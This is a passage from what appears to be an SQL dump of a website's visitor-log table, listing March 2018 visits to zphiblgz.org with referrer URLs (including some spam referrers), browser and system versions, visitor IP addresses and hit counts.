FpDaVdiMV9pWlM4Um81RlRRXzhQQUkxQjlVMXg2dyws&sign=55dab7da7ec5b6cef76cb583f661edc9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','151.80.126.209','000',2,0),(27571,'2018-03-27','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','173.69.213.158','000',9,0),(27572,'2018-03-27','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.108','000',1,0),(27573,'2018-03-27','https://zphiblgz.org/event/ms-walk-2017/','AppleWebKit','Windows','534','','40.77.178.54','000',1,0),(27574,'2018-03-27','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiKq8H63IzaAhXiUN8KHSdrBL4QFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','159.142.31.91','000',5,0),(27575,'2018-03-27','https://zelena-mriya.com.ua/','MSIE','Windows','6.0','','46.118.113.100','000',2,0),(27576,'2018-03-27','https://outlook.live.com/','Firefox','Windows','52.0','','8.44.100.11','000',3,0),(27577,'2018-03-27','http://slomm.ru/','MSIE','Windows','5.5','','46.119.121.22','000',2,0),(27578,'2018-03-27','https://zphiblgz.org','Edge','Windows','14.14393','','214.4.253.121','000',4,0),(27579,'2018-03-27','https://zphiblgz.org','MSIE','Windows','11.0','','96.244.83.31','000',5,0),(27580,'2018-03-27','https://www.google.com/','Firefox','Windows','58.0','','204.126.132.241','000',2,0),(27581,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','50.225.39.86','000',4,0),(27582,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','50.225.39.81','000',2,0),(27583,'2018-03-27','https://zphiblgz.org','Chrome','Windows','59.0.3031.0','','85.152.56.230','000',1,0),(27584,'2018-03-27','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.77','000',5,0),(27585,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.129','000',3,0),(27586,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.128','000',1,0),(27587,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.136','000',1,0),(27588,'2018-03-27','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(27589,'2018-03-27','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.21.169','000',1,0),(27590,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.140','000',1,0),(27591,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.158','000',1,0),(27592,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.131','000',1,0),(27593,'2018-03-27','https://zphiblgz.org','Firefox','Macintosh','24.0','','35.184.51.238','000',18,0),(27594,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','50.225.39.92','000',4,0),(27595,'2018-03-27','https://www.google.com/','Chrome','Windows','65.0.3325.181','','107.181.101.66','000',2,0),(27596,'2018-03-27','https://zphiblgz.org','Firefox','Windows','40.1','','219.92.100.125','000',2,0),(27597,'2018-03-27','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(27598,'2018-03-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(27599,'2018-03-27','https://zphiblgz.org','Firefox','Windows','40.1','','217.95.105.192','000',2,0),(27600,'2018-03-27','http://metallo-konstruktsii.ru/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(27601,'2018-03-27','https://zphiblgz.org','Edge','Windows','16.16299','','96.244.50.179','000',11,0),(27602,'2018-03-27','https://zphiblgz.org','Chrome','Windows','24.0.1290.1','','79.164.142.33','000',2,0),(27603,'2018-03-27','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','68.134.6.95','000',4,0),(27604,'2018-03-27','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.135.225.157','000',1,0),(27605,'2018-03-27','https://zphiblgz.org/scholarship/application/?gf_token=adde7e3c480547b9abed971e10974209','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',1,0),(27606,'2018-03-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.158.114.196','000',2,0),(27607,'2018-03-27','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',2,0),(27608,'2018-03-27','https://zphiblgz.org/','Chrome','Windows','63.0.3239.108','','151.237.188.180','000',1,0),(27609,'2018-03-27','https://picturesmania.com/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(27610,'2018-03-27','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(27611,'2018-03-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(27612,'2018-03-27','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.81','000',1,0),(27613,'2018-03-27','https://outlook.live.com/','Chrome','Windows','65.0.3325.181','','96.244.204.238','000',8,0),(27614,'2018-03-27','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.9.62','000',1,0),(27615,'2018-03-27','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.9.26','000',1,0),(27616,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(27617,'2018-03-27','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(27618,'2018-03-27','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','131.253.25.175','000',1,0),(27619,'2018-03-27','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(27620,'2018-03-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(27621,'2018-03-27','https://zphiblgz.org/','Firefox','Windows','52.0','','82.193.109.243','000',1,0),(27622,'2018-03-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(27623,'2018-03-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.23.100','000',2,0),(27624,'2018-03-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(27625,'2018-03-28','http://zphiblgz.org/','Firefox','Windows','45.62.19','','51.15.152.223','000',2,0),(27626,'2018-03-28','http://zphiblgz.org/','Opera','Windows','12.16','','195.22.127.67','000',3,0),(27627,'2018-03-28','https://infodocsportal.com/','Opera','Windows','9.00','','134.249.55.53','000',2,0),(27628,'2018-03-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','196.47.64.42','000',1,0),(27629,'2018-03-28','https://professionalsolutions.eu/ru/','MSIE','Windows','6.0','','178.137.86.152','000',3,0),(27630,'2018-03-28','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','12.236.180.78','000',1,0),(27631,'2018-03-28','http://www.google.com/','Chrome','Android','65.0.3325.109','','172.58.184.143','000',4,0),(27632,'2018-03-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1740.vRctZZ-VbZXVvAoNK42gVJlazsHAKFqnQRKnATiEiNE.a2d435274bef2b59faf7002e7f5d313c38ddd6b5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YUd6NjA5RXY0Q0JnQm1SZUdjdjVkbktrdm5jTnNybGJNODVhTnpJWHk1QSws&sign=ee6d8a740b4691267a2ac00b647c5a34&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.177.143.192','000',2,0),(27633,'2018-03-28','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.87','000',4,0),(27634,'2018-03-28','https://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',5,0),(27635,'2018-03-28','http://www.google.com/','Chrome','Android','65.0.3325.109','','50.225.39.73','000',2,0),(27636,'2018-03-28','https://hoztorg-opt.ru/','MSIE','Windows','2.0d','','46.119.121.22','000',1,0),(27637,'2018-03-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.32','000',1,0),(27638,'2018-03-28','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.75','','50.225.39.76','000',5,0),(27639,'2018-03-28','http://skinali.photo-clip.ru/','MSIE','Windows','2.0d','','46.118.113.100','000',2,0),(27640,'2018-03-28','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.75','000',14,0),(27641,'2018-03-28','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(27642,'2018-03-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.33.5.110','000',1,0),(27643,'2018-03-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1740.xOwl-QSJ0C27QsKGv8wCIg_YUFOsGkS7Ml18JjW_Q7g.4b183c1e207ab2def7b8ab2f9b399339254ab65e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WGZQZTg2Sk13NlJEa2xDb3lmM2NBcVFNTDRrb1NOdDZFbVZwcG9hTXlZUSws&sign=ec166e1de318fdd3f552da094a2bf05d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.187.8','000',2,0),(27644,'2018-03-28','https://ek-invest.ru/','MSIE','Windows','5.5','','46.118.113.100','000',3,0),(27645,'2018-03-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1740.pJoESPWE4Tksd7MBXOU804U4cfP1C9veKhJtENgq__Y.0a9ba9a38b5f74efa903fa236e9dd06f5571b7e1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042LWVsWXVfSnpTWEtuaHNiX082LWtYNXVJQ2hyZFhmQ1gyOGFEcWlTdFA0USws&sign=65efa7dc71223993da2ceed3d0324a90&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','18.217.10.73','000',2,0),(27646,'2018-03-28','https://zphiblgz.org','MSIE','Windows','11.0','','146.112.239.237','000',1,0),(27647,'2018-03-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1740.ULxuSswxqRTC_e3VpsAzm5RiKFtnkruO4yph8-yf3Yg.206d0c7440d3fdb03caf1f14aac5045c6c5bcf94&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040WkFLbWNMWWNiYVJRUlhUTVFOcVNkQmFONTBhZXZycW9CZ3gyX1FRelVhQSws&sign=6e07166b2efe431c4b5160077604dec0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.110','000',2,0),(27648,'2018-03-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','139.162.241.28','000',1,0),(27649,'2018-03-28','https://www.google.com/','Chrome','Windows','65.0.3325.181','','146.112.239.196','000',3,0),(27650,'2018-03-28','https://zphiblgz.org/','Chrome','Windows','65.0.3325.181','','146.112.239.228','000',3,0),(27651,'2018-03-28','https://zphiblgz.org/','Chrome','Windows','65.0.3325.181','','146.112.239.222','000',3,0),(27652,'2018-03-28','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.102.191.18','000',3,0),(27653,'2018-03-28','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','167.102.191.51','000',2,0),(27654,'2018-03-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.85.100','000',4,0),(27655,'2018-03-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.229.101.34','000',4,0),(27656,'2018-03-28','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(27657,'2018-03-28','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',2,0),(27658,'2018-03-28','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.75','000',3,0),(27659,'2018-03-28','https://www.google.com/','Chrome','Windows','65.0.3325.181','','208.58.4.90','000',5,0),(27660,'2018-03-28','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(27661,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.203','000',3,0),(27662,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.209','000',5,0),(27663,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.202','000',2,0),(27664,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.212','000',5,0),(27665,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.195','000',2,0),(27666,'2018-03-28','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.199','000',1,0),(27667,'2018-03-28','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(27668,'2018-03-28','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(27669,'2018-03-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(27670,'2018-03-28','https://zphiblgz.org','NYU','Unknown','Unknown','','5.188.203.40','000',1,0),(27671,'2018-03-28','https://www.google.com/','Firefox','Windows','59.0','','169.226.22.160','000',4,0),(27672,'2018-03-28','https://zphiblgz.org','Firefox','Linux','59.0','','71.121.248.185','000',2,0),(27673,'2018-03-28','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(27674,'2018-03-28','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(27675,'2018-03-28','https://docsarchive.net/','MSIE','Windows','5.5','','134.249.55.53','000',2,0),(27676,'2018-03-28','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',7,0),(27677,'2018-03-28','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(27678,'2018-03-28','http://veselokloun.ru/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(27679,'2018-03-28','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','166.137.240.28','000',1,0),(27680,'2018-03-28','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(27681,'2018-03-28','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','107.77.202.69','000',2,0),(27682,'2018-03-28','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(27683,'2018-03-28','https://zphiblgz.org/scholarship/application/','Chrome','Windows','65.0.3325.162','','73.172.63.178','000',1,0),(27684,'2018-03-28','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(27685,'2018-03-28','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',2,0),(27686,'2018-03-28','https://popugaychiki.com/','MSIE','Windows','6.0','','46.118.113.100','000',3,0),(27687,'2018-03-28','https://zphiblgz.org','Safari','Linux','534.34','','199.30.228.142','000',3,0),(27688,'2018-03-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(27689,'2018-03-28','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','68.134.29.211','000',3,0),(27690,'2018-03-28','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',2,0),(27691,'2018-03-28','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',10,0),(27692,'2018-03-28','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.32.232','000',15,0),(27693,'2018-03-28','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',4,0),(27694,'2018-03-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(27695,'2018-03-28','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.165.148.51','000',1,0),(27696,'2018-03-28','https://zphiblgz.org','Safari','iPhone','11.0','','172.58.185.40','000',1,0),(27697,'2018-03-28','https://zphiblgz.org/scholarship/application/?gf_token=2b6ab36135d64e4d80cce89624f73feb','Chrome','Windows','65.0.3325.181','','96.244.204.238','000',3,0),(27698,'2018-03-28','https://zphiblgz.org','Safari','iPhone','11.0','','73.200.188.232','000',1,0),(27699,'2018-03-28','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',6,0),(27700,'2018-03-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','209.250.230.243','000',2,0),(27701,'2018-03-29','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(27702,'2018-03-29','http://texnika.com.ua/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(27703,'2018-03-29','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(27704,'2018-03-29','http://www.openurls.com.cn/','Firefox','Windows','52.0','','45.33.50.172','000',2,0),(27705,'2018-03-29','http://www.openurls.com.cn/','MSIE','Windows','11.0','','101.226.225.84','000',1,0),(27706,'2018-03-29','https://zphiblgz.org','Android Browser','Android','4.0','','101.226.225.85','000',1,0),(27707,'2018-03-29','https://studentguide.ru/','MSIE','Windows','6.0','','178.159.37.55','000',2,0),(27708,'2018-03-29','https://zphiblgz.org','NYU','Unknown','Unknown','','5.188.203.40','000',2,0),(27709,'2018-03-29','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.165.148.51','000',1,0),(27710,'2018-03-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.24','000',1,0),(27711,'2018-03-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.111','000',1,0),(27712,'2018-03-29','https://zphiblgz.org','Safari','iPhone','9.0','','125.84.183.83','000',1,0),(27713,'2018-03-29','https://zphiblgz.org','Safari','iPhone','9.0','','110.167.93.81','000',1,0),(27714,'2018-03-29','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(27715,'2018-03-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1741.t44aEvtMcf-GKFmguUrAu7h2GHc4RdDGLZhrmE2Q3zs.c805a546d052bd24ebe9d95060843ae8270e941e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aGduSkhBdFZTNVJOeDB0LU13bnVWcktHZ1hWSnhOUzVGSE5qTktYbVo4Zyws&sign=18c2fe21118762b153501bcb69c75460&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.117.155','000',2,0),(27716,'2018-03-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1741.2Xw6Kc8IycS22XvvTV4sc-_rEKgWyBhaffh6vTgyO-s.fa97ff0386720a1354de6ec1a4c646430395cd62&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041OUZEa3RIMXhIWjdLdmJfX19ZUEY5T1FGRkNUb1pwWWM2Ykp0T2FTNUJNQSws&sign=083901811cb54851b277b5aec8c0ba83&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.136.53','000',2,0),(27717,'2018-03-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1741.WkGfTGxAVpYAza7EwnevyZ-OJUWrolcsNSuPuG_qiS8.6ba5e5f423ff74eec55fe3fcddb523924cc5dafc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042d0NLdWRQYmpjSDU3N01VSk9xR3A4ZjNkTzNEOWFZcm1qbHVYUXZkUmVrUSws&sign=f1c50ac37fdaca36ef1e2351e70f412e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.143.71','000',2,0),(27718,'2018-03-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1741.smHqbT6jPdF9UvUjB9UfXTlqVPe3dm9KY3L9Vnhei1g.e634081f1f7e43a1cd3ffe8d459c55d2d5261d0a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VVBXSHJTemg3RjNIREZ0UzNpbnd3cWY3a3hyRGxIcC1JV3hqUi1xUUhGdyws&sign=21c0d137bff31fa9b73e6d13230a2628&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.226.214','000',2,0),(27719,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(27720,'2018-03-29','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.76','000',4,0),(27721,'2018-03-29','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(27722,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','50.225.39.82','000',10,0),(27723,'2018-03-29','https://www.google.com/','Edge','Windows','16.16299','','50.225.39.76','000',7,0),(27724,'2018-03-29','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(27725,'2018-03-29','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','71.179.165.166','000',7,0),(27726,'2018-03-29','https://www.google.ru/','Chrome','Windows','57.0.2987.137','','109.172.63.18','000',2,0),(27727,'2018-03-29','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(27728,'2018-03-29','android-app://com.google.android.gm','Chrome','Android','61.0.3163.98','','174.204.10.131','000',3,0),(27729,'2018-03-29','https://www.google.com/','Chrome','Windows','65.0.3325.181','','204.126.132.241','000',10,0),(27730,'2018-03-29','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(27731,'2018-03-29','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','73.200.184.66','000',3,0),(27732,'2018-03-29','https://www.remind.com/','Firefox','Macintosh','53.0','','50.225.39.86','000',3,0),(27733,'2018-03-29','https://docs4all.com/','MSIE','Windows','5.5','','134.249.55.53','000',1,0),(27734,'2018-03-29','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(27735,'2018-03-29','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(27736,'2018-03-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(27737,'2018-03-29','https://dermatovenerologiya.com/','MSIE','Windows','6.0','','134.249.55.53','000',1,0),(27738,'2018-03-29','https://zphiblgz.org/scholarship/application/?gf_token=adde7e3c480547b9abed971e10974209','Chrome','Macintosh','63.0.3239.132','','50.225.39.76','000',2,0),(27739,'2018-03-29','https://www.google.com/','Chrome','Windows','65.0.3325.181','','68.134.25.149','000',4,0),(27740,'2018-03-29','https://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',1,0),(27741,'2018-03-29','https://zphiblgz.org','Firefox','Windows','56.0','','204.126.132.241','000',3,0),(27742,'2018-03-29','https://zphiblgz.org/scholarship/recommendation/','Chrome','Macintosh','63.0.3239.84','','96.91.250.74','000',1,0),(27743,'2018-03-29','https://zphiblgz.org/','Edge','Windows','16.16299','','73.173.97.121','000',11,0),(27744,'2018-03-29','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','65.55.210.97','000',1,0),(27745,'2018-03-29','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.78','000',8,0),(27746,'2018-03-29','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.141','000',2,0),(27747,'2018-03-29','https://loadingtimer.blogspot.com/b/app-preview?token=WLXXdGIBAAA.pss7iR_LuZ-x_44cE1TuqZe94-9ds73WkAaeBSVJ3B-Mb9-bs8O2HC7mopoIKEcJ.IlKO-zFJ0pipmO-xsHsSyg','Chrome','Windows','62.0.3177.0','','5.62.63.221','000',1,0),(27748,'2018-03-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(27749,'2018-03-29','http://www.google.com/','Chrome','Android','65.0.3325.109','','68.134.114.18','000',9,0),(27750,'2018-03-29','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','198.143.158.178','000',2,0),(27751,'2018-03-29','https://www.google.com/','Safari','Macintosh','10.0.1','','128.172.245.77','000',2,0),(27752,'2018-03-29','http://autoblog.org.ua/','MSIE','Windows','7.0','','178.159.37.55','000',3,0),(27753,'2018-03-29','http://www.club-lukojl.ru/','MSIE','Windows','5.5','','178.137.86.152','000',2,0),(27754,'2018-03-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(27755,'2018-03-29','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(27756,'2018-03-29','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.232.170','000',1,0),(27757,'2018-03-29','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',2,0),(27758,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(27759,'2018-03-29','https://zphiblgz.org','MSIE','Windows','7.0','','52.2.199.132','000',2,0),(27760,'2018-03-29','https://zphiblgz.org','MSIE','Windows','7.0','','34.194.50.234','000',39,0),(27761,'2018-03-29','https://zphiblgz.org','Safari','Linux','538.1','','54.209.221.103','000',3,0),(27762,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.199.9.71','000',1,0),(27763,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.194.20.206','000',2,0),(27764,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.196.218.68','000',1,0),(27765,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.236.75.160','000',2,0),(27766,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.204.135.106','000',1,0),(27767,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','52.21.196.44','000',1,0),(27768,'2018-03-29','http://zphiblgz.org/','MSIE','Windows','7.0','','34.234.23.18','000',1,0),(27769,'2018-03-29','https://krasnodar-avtolombard.ru/','MSIE','Windows','6.0','','46.118.127.172','000',2,0),(27770,'2018-03-29','https://www.google.com/','Edge','Windows','16.16299','','173.62.193.56','000',2,0),(27771,'2018-03-29','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.129.22.251','000',10,0),(27772,'2018-03-29','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',2,0),(27773,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.181','','73.213.32.232','000',3,0),(27774,'2018-03-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.192.0.58','000',1,0),(27775,'2018-03-29','https://zphiblgz.org','Firefox','Macintosh','57.0','','71.127.150.254','000',17,0),(27776,'2018-03-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(27777,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',4,0),(27778,'2018-03-29','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','71.244.128.30','000',2,0),(27779,'2018-03-29','https://zphiblgz.org','Chrome','Macintosh','38.0.2138.29','','138.128.3.47','000',2,0),(27780,'2018-03-29','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(27781,'2018-03-29','https://zphiblgz.org','Firefox','Windows','40.1','','223.229.175.98','000',2,0),(27782,'2018-03-29','74.220.219.51','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(27783,'2018-03-29','h